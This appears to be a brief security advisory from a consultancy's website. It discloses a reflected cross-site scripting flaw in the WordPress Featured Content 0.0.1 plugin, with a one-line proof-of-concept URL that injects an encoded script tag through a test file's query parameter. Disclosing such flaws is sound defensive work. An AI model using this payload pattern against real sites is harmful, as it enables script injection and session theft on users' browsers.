Home
Consulting
Advisories
Software
Articles
Contact

WordPress Featured Content 0.0.1 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in WordPress Featured Content 0.0.1 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/wordpress/wp-content/plugins/featured-content/js/modalbox/tests/functional/_ajax_method_get.php?param=%3Cscript%3Ealert%280%29%3C%2fscript%3E


Copyright © 2018 AutoSec Tools LLC